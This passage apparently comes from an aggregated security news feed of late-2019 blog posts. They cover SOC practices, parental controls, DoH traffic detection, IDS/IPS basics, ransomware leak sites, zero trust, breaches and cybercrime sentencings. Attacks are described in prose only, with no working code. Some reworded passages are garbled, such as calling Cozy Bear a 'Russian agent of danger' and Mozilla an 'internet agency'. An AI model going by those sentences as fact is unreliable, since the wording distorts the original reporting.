We learned that several technologies are key to reducing toil (in addition to automation):

  • Fusion—Adversary attack operations frequently trip multiple alerts in multiple tools, and these must be correlated and linked to avoid duplication of effort. Our SOC has found significant value from technologies that automatically find and fuse these alerts together into a single incident. Azure Security Center and Microsoft Threat Protection include these natively.
  • Integration—Few things are more frustrating and time consuming than having to switch consoles and tools to follow a lead (a.k.a., swivel chair analytics). Switching consoles interrupts their thought process and often requires manual tasks to copy/paste information between tools to continue their work. Our analysts are extremely appreciative of the work our engineering teams have done to bring threat intelligence natively into Microsoft’s threat detection tools and link together the consoles for Microsoft Defender ATP, Office 365 ATP, and Azure ATP. They’re also looking forward to (and starting to test) the Microsoft Threat Protection Console and Azure Sentinel updates that will continue to reduce the swivel chair analytics.

Stay tuned for the next segment in the series, where we’ll conclude our investigation, remediate the incident, and take part in some continuous improvement activities.

Learn more

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

To learn more about SOCs, read previous posts in the Lessons learned from the Microsoft SOC series, including:

Watch the CISO Spotlight Series: Passwordless: What’s It Worth.

Also, see our full CISO series and download our Minutes Matter poster for a visual depiction of our SOC philosophy.

The post CISO series: Lessons learned from the Microsoft SOC—Part 3b: A day in the life appeared first on Microsoft Security.

Parental Controls – Trend Micro Home Network Security has got you covered

We continue our three-part series on protecting your home and family. If you missed our first part, you can find it here

Are your kids at that formative age when they’re beginning to use mobile devices? How about at that inquisitive age when they start to discover the wonders of the Internet? Or that age when they tend to be more carefree and self-indulgent?

The Internet and the digital devices our children use are valuable tools when used the right way. They give them access to a wide range of information, pave the way to explore worthwhile ideas, and keep them socially connected with family, relatives and friends. That said, though there are big advantages to kids’ use of the Internet, there are dangers as well. Part 2 of our 3-part series on home network security discusses those dangers to your children and what you can do to protect them, leveraging Trend Micro Home Network Security’s Parental Controls to help you do so.

Internet Access Threats are Real

Gone are the days when simple malware was the focal point for internet safety. Nowadays, children have so many devices giving them access to the internet, unknown dangerous situations have multiplied. As a parent, the challenges include the following:

  • Your children can come across unwanted or explicit content (such as porn), whether intentionally or unintentionally.
  • Your children can become victims of cyber bullies or internet predators through messaging apps they use or websites they visit.
  • Your kids could be concealing their delinquent online activities from you.
  • There also may be apps your kids are using that you don’t approve of. Conversely, there may be apps you approve, but your kids are spending too much time on them.
  • Your youngers could be consuming too much time with their digital devices, instead of studying or doing other productive activities.

Parental Controls: Your Silent Partner

Finding the right balance between parenting and controlling the child’s use or possible misuse of the internet is tricky. Here’s where Trend Micro Home Network’s (HNS) Parental Controls can come in. In addition to protecting your home network from security risks and attacks, HNS also provides a robust and flexible parental control system to keep internet usage safe for your children. Controls include:

  • Web Access Control and Monitoring, which gives parents the ability to allot Daily Time Quotas as well as to implement a Customizable Schedule for your child’s screen time. The controls include the means to Pause Internet Access by each Family Member’s Profile; and they also provide general Online Connectivity Monitoring for observing family members’ internet usage.
  • Website and Content Filtering blocks inappropriate websites and content. It also enables parents to turn on Google Safe Search and YouTube Restricted Mode.
  • App Controls manages YouTube Pause and Time Limits. In addition, App Detection alerts you if your children are detected using potentially inappropriate apps.

Parental Controls that Work for You

Protecting your family members online starts with Adding a Profile.

You can add a new Profile for each Family Member and assign to them the devices they control. To do this, you can just simply tap Family in the Command Menu and choose the family member by tapping Add Someone. This will let you provide the Profile Name and Profile Picture as well as Assign Devices to the person by tapping the device(s) in the Unassigned panel. The devices you select will then be automatically moved into the ownership panel for that person. Tap Done and you’ll be presented with the Settings screen for that child’s Profile, where you can configure Parental Controls as you see fit.

Website Filtering

Next, let’s proceed with the most common component: Website Filtering.

  • To set this up, tap Set Up Now for Filtering to block inappropriate websites and content for this family member.
  • Once the Filtering screen appears, you can toggle on Get Notifications for this family member when selected websites are visited, and Block to block selected websites for this family member’s profile.
  • You can also tap the appropriate pre-configured setting for the Age Level for this particular profile. You can choose from Child, Pre-Teen, and Teen; or tap Custom to manually select categories and subcategories to block. Filtered Categories include: Adult or Sexual (e.g. Pornography), Communication or Media (e.g. Social Networking), Controversial (e.g. Violence, Hate, Racism) and Shopping and Entertainment (e.g. Games, Gambling).
  • There may be instances where you may want to set exceptions to allow specific websites to be accessed or blocked. To do so, tap Set Exceptions and then add the website URL to either the Allowed List or Denied List.

Content Filtering

Moving on, you can also set up Content Filtering.

  • Setting up Content Filtering is quite straightforward. For example, you can toggle Turn On Google Safe Search to filter Google search results on your child’s phone, tablet or computer within your home network.
  • Likewise, all you need to do to restrict mature, inappropriate and offensive content on YouTube search results on your child’s devices is to toggle Turn On YouTube Restricted Mode.

App Controls

To continue, there are apps that parents disapprove of, but there are always those instances when the children try to use them anyway against their parent’s wishes. That’s when you can choose to be informed of the Inappropriate Apps Used by your children.

  • You can achieve this by tapping Set Up Now under Inappropriate App Used and then enabling Get Notifications.
  • You can then choose from the App Categories such as Games, Adult, Social Network or Chat, Shopping or Advertisement, Media/Streaming, Dating and VPN, which will send an alert once those selected apps are used by your kids on their respective devices.

Time Limits and Notifications

Even when you try to teach your kids about being responsible about their online time, it’s easier said than done. Thus, parents or guardians can schedule the hours of screen time their children are allowed each day, along with the hours when screen time is available. HNS’s Parental Controls provide both of these features and more.

  • To set up Time Limits, just tap Set Up Now to bring up Add First Rule. You can select the days for this rule and the number of hours per day that your child can use the internet.
  • You can indicate the Internet Time Limit and Time on YouTube by scrolling back and forth to see the limits available, then tap the total time per day you want to allow.
  • Once you set the limits, you may want to toggle Get Notifications to tip you off when your child reaches the limit.
  • Next, you’ll set the time period when your child can use the Internet by tapping the From and To fields, and moving the Time Wheelbar accordingly for the Beginning and Ending
  • You can opt to be informed by selecting Get Notifications when your child attempts to use the internet outside the allowed time period, as well as Block Internet Access for the child when they do.
  • Before tapping Done to finalize the rule(s), the Rule Complete screen shows a summary of the rule you’ve set, providing a clock to show the Allowed Time, the Days for which the rule is set, the Hours of Internet allowed, including any time allowed for YouTube viewing, and the Times

Connection Alerts

Last but not least, since it’s tough to keep monitoring when your child is online, tapping Trend Micro HNS’ Connection Alert to toggle it on makes it easier for parents to get notifications when their kid’s digital devices connect to the home network during a specified time period.

In the end, Trend Micro Home Network Security’s Parental Controls can assist parents in dealing with the online safety challenges all children are exposed to in the 21st century. HNS’ flexible and intuitive feature set comprised of Filtering, Inappropriate App Used, Time Limits and Connection Alerts support every parent or guardian’s goal to ensure a safe and secure internet experience for their kids. Coupled with kind face-to-face conversations, where you let your children know your care for them extends to how they use the Internet, HNS becomes your silent partner when ensuring your family’s safety.

For more information, go to Trend Micro Home Network Security.

The post Parental Controls – Trend Micro Home Network Security has got you covered appeared first on .

Researcher: Identifying non-decryption DNS-Over-HTTPS traffic

Apparently, without even decrypting it, DNS-over-HTTPS (DoH) traffic can be detected, a security researcher has discovered.

The aim of the DoH protocol is to improve the overall Internet security by using TLS when submitting DNS requests and obtaining DNS responses over HTTP.

DoH seeks to counter both passive monitoring and aggressive redirection attacks by encrypting DNS data and allowing domain authentication. Different protections are given over TLS via DNS.

One could actually identify DoH traffic by analyzing both traffic to and from a site, according to Johannes Ullrich, Dean of Research at the SANS Technology Institute.

For his project, the researcher used Firefox since Mozilla makes it easy to activate DoH — the internet agency has been operating with DoH since 2017— and because the software enables TLS master keys to be obtained via the SSLKEYLOGFILE environment variable (Chrome often allows this).

Firefox 71 on Mac was used for the experiment with Cloudflare as a resolver — Mozilla has also recently added NextDNS to its Trusted Recursive Resolver (TRR) program.

Although not definitive, particularly since only a few minutes of traffic was obtained, the test showed that DoH traffic is actually easy to identify.

The researcher launched Firefox after running tcpdump, and navigated to a few dozen sites. The packet capture file was loaded into Wireshark 3.1.0, which fully supports DoH and HTTP2 (Firefox requires HTTP2 for DoH).

“I identified the DoH traffic using the simple display filter ‘dns and tls.’ The entire DoH traffic was confined to a single connection between my host and (2606:4700::6810:f8f9),” the researcher notes.

In this particular case, traffic could be identified using the hostname, but one could run their own DoH server as well.

Further research has showed that traffic can be defined using the DoH payload frequency. Usually, DNS queries and replies are no larger than a few hundred bytes, whereas HTTPS links appear to reach the entire transmission unit (MTU), describes Ullrich.

“In short: if you see long-lasting TLS connections, with payloads that rarely exceed a kByte, you probably got a DoH connection,” the researcher notes.

Some of the objects found during the trial may be unique to execution, but some more definitive findings might come from additional testing, Ullrich also states.


The post Researcher: Identifying non-decryption DNS-Over-HTTPS traffic appeared first on .

The Best Templates for Posting Cybersecurity Jobs

The cybersecurity of a company is heavily reliant upon the skills and knowledge of the people who install, manage, and operate its security products. This means that recruiting and nurturing the best security team possible should be a CISO's top priority. Cynet's Ultimate Cybersecurity Job Posting Templates (download here) provide a list of the main responsibilities and skills for typical

7 ‘crackpot’ technologies that might transform IT

Innovation is the cornerstone of technology. In IT, if you’re not experimenting with a steady stream of emerging technologies, you risk disruption. Moreover, you can find yourself challenged when it comes to luring top talent and keeping ahead of competitors.

But knowing which bets to place when it comes to adopting emerging technologies can seem impossible. After all, most fizz out, and even those that do prove worthwhile often fall a little short of their hyped potential. Plus, most of what has most recently been considered cutting-edge today, such as artificial intelligence and machine learning, is already finding its way into production systems. You have to look far ahead sometimes to anticipate the next wave coming. And the farther out you look, the more risky the bets become.

To read this article in full, please click here

(Insider Story)

How do Intrusion Detection/Prevention Systems work?

Estimated reading time: 3 minutes

Enterprises mainly use two types of systems to deal with network intrusions – Intrusion Detection System (IDS) and Intrusion Prevention System (IPS). While the two systems are primarily similar, it is important to understand the major aspects which distinguish them.

Intrusion Detection Systems (IDS) operate through a process where events on the network are monitored and analyzed to detect possible incidents of trespassing or violation of security markers. This is mainly a reactive process where all incoming and outgoing network activity is monitored and any signs of intrusion in the systems that could jeopardize the business are flagged. Its main function is to raise an alert when it discovers any such activity and hence it is commonly known as a passive monitoring system.

IDS uses the following techniques to detect attacks –

Signature-Based Detection

Through this method, IDS detects an attack with a pattern or signature that corresponds to a known type of attack — signatures are compared to past observed events to identify a possible attack. For example, an IPS system would flag an email with a subject line like ‘Free pics’ as it is a known signature of malware. This kind of detection is effective for detecting attacks that are logged in the system.

Anomaly-Based Detection

In the Anomaly-Based Detection method, IDS matches network activity against a normal profile of activity. When network activity is observed that is anomalous to this normal profile, the system can flag it. For example, IDS will detect an incident when it observes large amounts of data, flow on a network which is considerably higher than the normal pattern. However, in this type of method, the profile must be continuously updated as false positives may occur.

Intrusion Prevention Systems (IPS) are a step forward from IDS in terms of capabilities. Where IDS is a reactionary mechanism, IPS is proactive and attempts to go one step ahead of detection, actively seeking to prevent the detected threat from succeeding. It is an active control mechanism that monitors the network traffic flow. It identifies and averts vulnerability exploits in the form of malicious inputs that intruders use to interrupt and gain control of an application or a system.

IPS technologies attempt to stop a detected attack from succeeding through some of the below actions:

Terminating network connection

The IPS can attempt to stop a detected attack within the network by terminating the connection being used for the attack and access being blocked to the target from the offending account.

Automating security controls

On detection of an attack or vulnerabilities within a host, an IPS can attempt to prevent damage by applying some preset automated security controls by downloading of patches or reconfiguring the settings of a firewall.

Attempt to make the attack benign

An IPS can attempt to tackle an attack by trying to make it benign, like removing a malicious attachment from a mail.

Seqrite’s Unified Threat Management (UTM) offers a one-stop solution for all enterprise security needs which includes intrusion detection and prevention as a standard feature.

UTM’s in-built IDS and IPS components keep enterprises safe by:

  • Monitoring, evaluating and catching threats in real-time
  • Preventing Denial of Service (DoS)/Distributed Denial of Service (DDoS) attacks
  • Preventing the discovery of open ports by attackers

Seqrite UTM’s IPS acts as a security barrier against unwanted intrusions into your network and forestalls a broad range of DoS and DDoS attacks before they penetrate the network. Deploying this level of protection can benefit an enterprise in various ways, including:

  • Providing a snapshot of network security at one glance
  • Protection of enterprise assets within the network
  • Triggers raised on detection of any suspected breach or activity in the network
  • A holistic approach towards prevention of intrusions

The post How do Intrusion Detection/Prevention Systems work? appeared first on Seqrite Blog.

Hacker Who Tried to Blackmail Apple for $100,000 Sentenced in London

A 22-year-old man who claimed to have access to over 300 million iCloud accounts and threatened to factory reset all accounts unless Apple pays ransom has pleaded guilty in London for trying to blackmail Apple. In March 2017, Kerem Albayrak from North London claimed to be a spokesman for a hacking group called the "Turkish Crime Family" and in possession of 319 million iCloud accounts.

Weekly Update 170

Weekly Update 170

Monday: 40C and lapping up the Gold Coast sunshine. Wednesday: -8C and lapping up... Juicy IPA! I'm back in Oslo and catching up with the locals including running a roundtable discussion for CSOs at Microsoft, visiting the Norwegian National Cyber Security Centre (recently onboarded to HIBP) and chatting with Forbrukerrådet, the Norwegian Consumer Counsel. Plus, there's an all new blog post on the long-overdue update to Scott Helme's and my little Why no HTTPS? Project.

Weekly Update 170
Weekly Update 170
Weekly Update 170
Weekly Update 170


  1. Forbrukerrådet does some excellent work identifying risks to consumers (link to their findings from a couple of year ago around kids tracking watches)
  2. Still why no HTTPS? There's still a heap of websites that need to lift their HTTPS game (see if you can lean on the biggest ones in your country)
  3. You can grab all the raw data for the aforementioned site from (there's actually some really interesting stats in there, especially those sites with certs expiring in less than 24 hours)
  4. Sponsored by Varonis. Free Video Course: 7 Hidden Office 365 Security Settings You Can Only Unlock with PowerShell

Hackers Behind GozNym Malware Sentenced for Stealing $100 Million

Three members of an international organized cybercrime group that was behind a multi-million dollar theft primarily against U.S. businesses and financial institutions have been sentenced to prison, the U.S. Justice Department announced. The criminals used the GozNym banking Trojan to break into more than 4,000 victim computers globally, primarily in the United States and Europe, between 2015

Selling Privacy: The Next Big Thing for Entrepreneurs

Black Friday and Cyber Monday made clear that the online-offline divide in consumers’ minds has almost disappeared. Among the big winners for sales in 2019 will be a device that is perhaps the best physical representation of that diminishing online-offline divide: the digital assistant.

The main contenders for consumer dollars this year come by way of Amazon, Google, and Apple.

Amazon Echo smart home products have been among the company’s most popular items for a while now, but they hit new records in the recent four-day stretch from Black Friday to Cyber Monday. Internet connectivity continues its march to omnipresence in everyday consumer goods.

Televisions feature built-in internet functionality, and the FBI just released a warning about them.

A number of the newer TVs also have built-in cameras. In some cases, the cameras are used for facial recognition so the TV knows who is watching and can suggest programming appropriately. There are also devices coming to market that allow you to video chat with Grandma in 42″ glory.

Beyond the risk that your TV manufacturer and app developers may be listening to and watching you, that television can also be a gateway for hackers to come into your home. A bad cyber actor may not be able to access your locked-down computer directly, but it is possible that your unsecured TV can give him or her an easy way in the backdoor through your router.

Hackers can also take control of your unsecured TV. At the low end of the risk spectrum, they can change channels, play with the volume, and show your kids inappropriate videos. In a worst-case scenario, they can turn on your bedroom TV’s camera and microphone and silently cyberstalk you.

The conveniences afforded by all this new connected technology are great, but it’s important to bear in mind that it also has its downside.

Even basic home goods like doorbells and light bulbs are commonly being sold with Wi-Fi connectivity and the ability to integrate into Google Home-, Siri-, or Alexa-enabled networks. These devices don’t just talk to one another. They’re also providing the companies that manufactured them with a gold mine of data about how they’re being used–and, increasingly, who is using them.

It’s not just IoT gadgets. Tech companies are busy these days trying to weave their way into your wallet, your entertainment, and your health, all the while mining as much data as possible to leverage into other markets and industries.

This has an air of inevitability about it because the right entrepreneur has not yet had the right aha! moment to make it stop being an issue. That said, cracks in the current personal information smash-and-grab approach to consumer data are beginning to appear, and consumers are becoming increasingly wary of how their data is being collected and used as well as who has access to it.

Break Out the Torches and Pitchforks

If a consumer revolt sounds overly optimistic, consider the uproar earlier this year over revelations that smart home speakers were eavesdropping consistently and sometimes indiscriminately on consumers, and the resulting semi-apologies issued by Apple, Amazon, and Google.

Or look at the ongoing civil rights concerns regarding Amazon’s Ring surveillance cameras, or the recent lawsuit against TikTok for allegedly offloading user data to China, or the reports of customers abandoning their Fitbits after the company was acquired by Google.

The message seems clear to me. Consumers may enjoy the convenience and easy access to the internet, but more and more they bristle at the lack of transparency when it comes to the way their data is being handled and used by third parties, and the seeming inevitability that it will wind up on an unsecured database for any and all to see.

While the fantasy of consumers uninstalling and unplugging en masse is common among a small community of sentient eels indigenous to the Malarkey Marshes of Loon Lake, there remains a business opportunity for the larger online community.

Will the Genius of Loon Lake Please Stand Up?

The effort to create a more privacy- and security-centric internet experience for consumers has largely been led by nonprofit organizations. World Wide Web inventor Tim Berners-Lee has been publicly discussing plans to create a follow-up with the aim of reverting to its original ideals of an open and cooperative global network with built-in privacy protections.

Meanwhile, the nonprofit Mozilla organization has revamped its Firefox browser to block several types of ad trackers by default and provide greater security for saved passwords and account information, in addition to publishing an annual guide to score internet-connected devices for their relative privacy friendliness and security. Wikipedia founder Jimmy Wales announced in November a service meant to provide an alternative to Twitter and Facebook reliant on user donations rather than the other social platforms’ often Orwellian ad tracking software.

Without a user base or killer app to drive adoption, Berners-Lee’s new web has been in the works for years, and Wales’s idea is a rehashing of a similar project called WikiTribune that also never managed to find its footing. Firefox is a quality browser, but its market share pales next to Google Chrome’s.

Thus far, nonprofit-driven alternatives have found no lure to drive consumer adoption. The next stage of privacy-centric development may need to have a profit motive to make inroads into the privacy protocols and proxies that dominate apps and devices. It can’t be merely self-sustaining, but rather must be compelling for users, developers, and engineers. One such company, Nullafi, has the right idea: anonymizing and individualizing a user’s most common digital identifier by creating email burners that redirect to the user’s private account. (Full disclosure: I’m an investor.) We need to see more of this kind of development, and we need to see it get adopted.

The current large-scale investment in cybersecurity proves there’s a market in our post-Equifax-breach world where awareness of data vulnerability and the possibility of getting hacked have hit critical mass. The time for the unicorns to arrive is now.

The post Selling Privacy: The Next Big Thing for Entrepreneurs appeared first on Adam Levin.

Cisco ASA DoS Bug Attacked in Wild

This post authored by Nick Biasini

Cisco Talos has recently noticed a sudden spike in exploitation attempts against a specific vulnerability in our Cisco Adaptive Security Appliance (ASA) and Firepower Appliance. The vulnerability, CVE-2018-0296, is a denial-of-service and information disclosure directory traversal bug found in the web framework of the appliance. The attacker can use a specially crafted URL to cause the ASA appliance to reboot or disclose unauthenticated information.

This vulnerability was first noticed being exploited publicly back in June 2018, but it appeared to increase in frequency in the past several days and weeks. As such, we are advising all customers to ensure they are running a non-affected version of code. Additionally, we want to highlight that there is a Snort signature in place to detect this specific attack (46897). Concerned customers should ensure it is enabled in applicable policies that could detect this exploitation attempt.

Read More>>

The post Cisco ASA DoS Bug Attacked in Wild appeared first on Cisco Blogs.

Threat Roundup for December 13 to December 20

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Dec 13 and Dec 20. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or

Read More


TRU12202019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for December 13 to December 20 appeared first on Cisco Blogs.

Maze Ransomware Operators Publish User Information

As if it wasn’t hard enough to have their data compromised, businesses who fell victim to Maze ransomware are now facing another threat: their data could become public.

Maze’s operators have been collecting data from victim organisations for a while, ultimately using it as a weapon until payment is received to decrypt archives. Now, for all those victims who refuse to pay the ransom, they threaten to release the data.

In this respect, a website was created by the threat actor where they identified the names and websites of eight businesses who allegedly refused to pay the sum demanded to retrieve their records.

According to technology journalist Brian Krebs, even though the event did not make news, at least one of the businesses on that list was actually targeted by Maze ransomware.

The Maze operators publish data on that page, such as the initial date of contamination, certain compromised records (office, text and PDF files), the overall volume of data allegedly obtained from the company, and the IP addresses and computer names of the infected servers.

The step is not shocking, particularly since the people behind Maze have been engaging in exfiltrating victim details for a while now and are also threatening to publicly disclose that information if the victim does not pay the demanded ransom.

Throughout one instance in which the Maze ransomware was introduced, the perpetrators first leveraged Cobalt Strike since obtaining access to the network, collecting data about the target area before advancing laterally. Also used was a tactic commonly associated with Russian agent of danger Cozy Bear.

The hackers then began using PowerShell to exfiltrate data and connect to a remote FTP server. They only implemented Maze ransomware after this phase was done to encrypt the data of the victim.

Cobalt Strike was used again after the original breach in another event that Cisco Talos attributed to the same perpetrator, and PowerShell was used to dump large amounts of data using FTP. Without making the information available, the attackers then demanded payment.

The two events are primarily linked through the Command and Control (C&C) technology used— the data was deposited to the same server as in the previously mentioned accident— using 7-Zip to compact the collected data, interactive logins through Windows Remote Desktop Protocol, and remote execution of PowerShell.

“The use of targeted ransomware attacks isn’t new and, unfortunately, it’s not going anywhere anytime soon. This is an extremely lucrative attack avenue for adversaries and as such, its popularity is likely only going to increase. What makes these particular attacks interesting is the additional monetization avenue of exfiltrating data in the process,” Talos points out.

The threat agent could demand more money from the victim with this data in hand, or could monetize it by selling it to other cyber criminals on dark web platforms. Not to mention that entities will pay for the damage incurred by their data being published.

“This trend of achieving maximum monetary gain for their nefarious activities is increasingly common in the crimeware space […]. Expect adversaries to be increasingly aware of the systems and networks they are compromising as all systems and networks are not created equally and some have much higher profit margins, when compromised,” Talos concludes.

The post Maze Ransomware Operators Publish User Information appeared first on .

The 3 W’s in Zero Trust Security

Picture this scenario: you are a security guard at an office building. Today you are looking after a restricted area. A person you’ve never seen before walks straight past you into one of the rooms. Would you stop them or would you just assume they are allowed to be there?

In a physical world, trust is most commonly based on who you are, not where you are. A savvy security guard would ask you for your ID before allowing you in. Virtually, though, the situation is different: being in the right place is often enough. If you are inside of a company’s network perimeter, it is often assumed you have the right to be there. You gain access to the same data and tools that any other trusted user would. It’s clear that such an approach is no longer enough.

Zero trust security comes in as an alternative model, more in line with the current threat landscape.  It is based on the principle of “always check, never trust“, originally introduced by Forrester. It takes into account 3 main factors:

  • Workforce: Employees are at risk of identity theft, which is one of the most widespread types of fraud today.
  • Workload: New vulnerabilities in applications and their improper management open highways for cybercriminals.
  • Workplace: With more and more connected devices, the workspace has extended far beyond the four walls of you company building.

Moving from a perimeter model to Zero Trust means assessing, adapting and implementing new security policies that address threats in a constantly changing environment. In this trust-centric approach access is granted to users and devices, not a network.

What's different in a Zero-Trust Approach

This means that policies now need to be calculated based on a vast number of data sources. All network activities must be continuously taken into account. Any indications of compromise or changes in the behaviour of apps, users and devices must be examined, validated and receive immediate responses.

How to apply a Zero Trust model

Cisco’s practical approach to Zero Trust includes six important steps.

  1. Establish levels of trust for users and user devices (identity verification with multi-factor authentication and device status, which must be compliant and properly updated)
  2. Establish levels of reliability for IoT and/or workloads (profile and baseline)
  3. Establish SD perimeters to control access to the application (authorised access)
  4. Establish SD perimeters to control access to the network (segmentation and micro-segmentation)
  5. Automate the adaptive policy using normalisation (network, data centre and cloud)
  6. Automate the adaptive policy using the response to threats (adapt the level of trust)


Cisco Zero-Trust Model: Duo for Workforce, SD-Access for workplace and Tetration for Workload

Zero Trust Security involves people, processes and technology in its adoption. It can provide a roadmap for a truly efficient and automated security infrastructure.

Join us at Cisco CISO Day in Barcelona

We will cover zero trust security and other strategic topics at the “Cisco CISO Day“, an exclusive event for CISOs, taking place on 27 January 2020 in Barcelona at the Cisco Co-Innovation Center. It is a great opportunity to talk with colleagues and experts and find concrete answers to any burning security questions.


Register for Cisco CISO Day


The post The 3 W’s in Zero Trust Security appeared first on Cisco Blogs.

This Week in Security News: Microsoft vs. Amazon in the Cloud and Escalated Risk in the Oil and Gas Industry

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about cybersecurity risk facing the oil and gas industry and its supply chain. Also, read about what Trend Micro’s CEO, Eva Chen, has to say about Microsoft and Amazon’s battle for cloud leadership.

Read on:

How to Get the Most Out of Industry Analyst Reports

In this video blog, Trend Micro’s Vice President of Cybersecurity, Greg Young, taps into his past experience at Gartner to explain how to discern the most value from industry analysts and help customers understand how to use the information.

Top Gun 51 Profile: Trend Micro’s Jeff Van Natter Sees Distributors as Key to Reaching New Partners

In an interview with Channel Futures, Trend Micro’s Jeff Van Natter explains why he believes distributors will continue to play an important role for Trend as it looks to expand its partner ecosystem.

How to Speed Up a Slow PC Running Windows OS

The first step to improving your Windows PC performance is to determine what’s causing it to run slow. In this blog, learn about eight tips on how to fix a slow PC running Windows and how to boost your PC’s performance.

We Asked 13 Software Execs Whether Microsoft Can Topple Amazon in the Cloud, and They Say There’s a Chance but It’ll Be a Hard Battle

Business Insider talked to 13 executives at companies that partner with Microsoft and Amazon on cloud platforms for their take on the rivalry between the two, and whether Microsoft can win. In this article, read about what Trend Micro CEO Eva Chen has to say about the rivalry.

DDoS Attacks and IoT Exploits: New Activity from Momentum Botnet

Trend Micro recently found notable malware activity affecting devices running Linux. Further analysis of the malware samples revealed that these actions were connected to a botnet called Momentum, which has been used to compromise devices and perform distributed denial-of-service (DDoS) attacks.

Oil and Gas Industry Risks Escalate, Cybersecurity Should Be Prioritized

The oil and gas industry and its supply chain face increased cybersecurity risks from advanced threat groups and others as they continue to build out digitally connected infrastructure, Trend Micro research reveals.

Christmas-Themed Shopping, Game and Chat Apps Found Malicious, Lure Users with Deals

Security researchers caution Android users when downloading apps for shopping, games, and Santa video chats as they found hundreds of malicious apps likely leveraging the season to defraud unwitting victims via command-and-control (C&C) attacks, adware or “excessive or dangerous combinations of permissions,” such as camera, microphone, contacts and text messages.

New Orleans Mayor Declares State of Emergency in Wake of City Cyberattack

New Orleans Mayor LaToya Cantrell declared a state of emergency last Friday after the city was hit by a cyberattack where phishing attempts were detected. Cantrell said the attack is similar to the July 2019 attack on the state level where several school systems in Louisiana were attacked by malware.

Credential Harvesting Campaign Targets Government Procurement Sites Worldwide

Cybersecurity company Anomali uncovered a campaign that used 62 domains and around 122 phishing sites in its operations and targeted government procurement services in 12 countries, including the United States, Canada, Japan, and Poland.

Schneider Electric Patches Vulnerabilities in its EcoStruxure SCADA Software and Modicon PLCs

Schneider Electric released several advisories on vulnerabilities they have recently fixed in their EcoStruxure and Modicon products. Modicon M580, M340, Quantum and Premium programmable logic controllers (PLCs) were affected by three denial of service (DoS) vulnerabilities.

FBot aka Satori is Back with New Peculiar Obfuscation, Brute-force Techniques

Trend Micro recently observed that the Mirai-variant FBot, also known as Satori, has resurfaced. Analysis revealed that this malware uses a peculiar combination of XOR encryption and a simple substitution cipher, which has not been previously used by other IoT malware variants. Additionally, the credentials are not located within the executable binary — instead, they are received from a command-and-control (C&C) server.

15 Cyber Threat Predictions for 2020

As 2020 nears, this article outlines the cyber threats that Trend Micro’s research team predicts will target organizations in the coming year, and why.

Negasteal/Agent Tesla Now Gets Delivered via Removable Drives, Steals Credentials from Becky! Internet Mail

Trend Micro recently spotted a Negasteal/Agent Tesla variant that uses a new delivery vector: removable drives. The malware also now steals credentials from the applications FTPGetter and Becky! Internet Mail.

Into the Battlefield: A Security Guide to IoT Botnets

The internet of things (IoT) has revolutionized familiar spaces by making them smarter. Homes, offices and cities are just some of the places where IoT devices have given better visibility, security and control. However, these conveniences have come at a cost: traditional cyberthreats also found a new arena for attacks and gave rise to realities like IoT botnets.


What’s your take on whether or not Microsoft can topple Amazon in the cloud? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Microsoft vs. Amazon in the Cloud and Escalated Risk in the Oil and Gas Industry appeared first on .

Apple Opens Its Invite-Only Bug Bounty Program to All Researchers

As promised by Apple in August this year, the company today finally opened its bug bounty program to all security researchers, offering monetary rewards to anyone for reporting vulnerabilities in the iOS, macOS, watchOS, tvOS, iPadOS, and iCloud to the company. Since its launch three years ago, Apple's bug bounty program was open only for selected security researchers based on invitation and

Cyber News Rundown: Honda Customer Data Leak

Reading Time: ~ 2 min.

Honda Customer Database Exposed

Officials have been working over the past work to secure a database containing highly sensitive information belonging to more than 26,000 North American customers of the Honda motor company. The database in question was originally created in October and was only discovered on December 11. While no financial information was included in the leak, the records did contain names, VIN numbers, and service details for thousands of customers.

Boeing Contractor Data Leak

Nearly 6,000 defense contractors working for Boeing have had personal information leaked after a user error left an Amazon web service bucket publicly exposed. The 6,000 Boeing staff are only a small portion of the 50,000 individual records found on the leaked server, many of whom were involved in confidential projects for the Department of Defense. These types of data leaks are increasingly common as more users are not properly securing their servers or using any form of authentication.

Sextortion Email Campaign Shutdown

After months spent chasing them across Europe, authorities have arrested the authors responsible for the Nuclear Bot sextortion campaign. With their Nuclear Bot banking trojan, the team was able to compromise roughly 2,000 unique systems and use them to help distribute malicious emails. Though it’s been verified that the original authors are in custody, the source code for Nuclear Bot was made public in the hope no money would be made from its sale.

Emotet Sent from Phony German Authorities

A new email campaign has been disguising itself as several German government agencies and spreading the Emotet trojan, infecting multiple agency systems. This campaign differs from previous Emotet attacks by appearing as a reply from a prior email to appear more legitimate. To best defend against these attacks, users are strongly encouraged to check both the sender’s name and address as well as ensuring that macros aren’t enabled in their Office apps.

LifeLabs Pays Ransom After Cyber-Attack

Canadian testing company LifeLabs decided to pay a ransom after attackers illicitly accessed the sensitive information for all 15 million of its customers. Oddly, many of the records being found date back to 2016 or earlier and have yet to be identified on any illicit selling sites. LifeLabs has since contacted all affected customers and has begun offering identity monitoring services.

The post Cyber News Rundown: Honda Customer Data Leak appeared first on Webroot Blog.

Hackers Stole Customers’ Payment Card Details From Over 700 Wawa Stores

Have you stopped at any Wawa convenience store and used your payment card to buy gas or snacks in the last nine months? If yes, your credit and debit card details may have been stolen by cybercriminals. Wawa, the Philadelphia-based gas and convenience store chain, disclosed a data breach incident that may have exposed payment card information of thousands of customers who used their cards at

12 days of Christmas Security Predictions: What lies ahead in 2020

Marked by a shortage of cyber security talent and attackers willing to exploit any vulnerability to achieve their aims, this year emphasised the need for organisations to invest in security and understand their risk posture. With the number of vendors in the cyber security market rapidly growing, rising standard for managing identities and access, and organisations investing more in security tools, 2020 will be a transformational year for the sector.

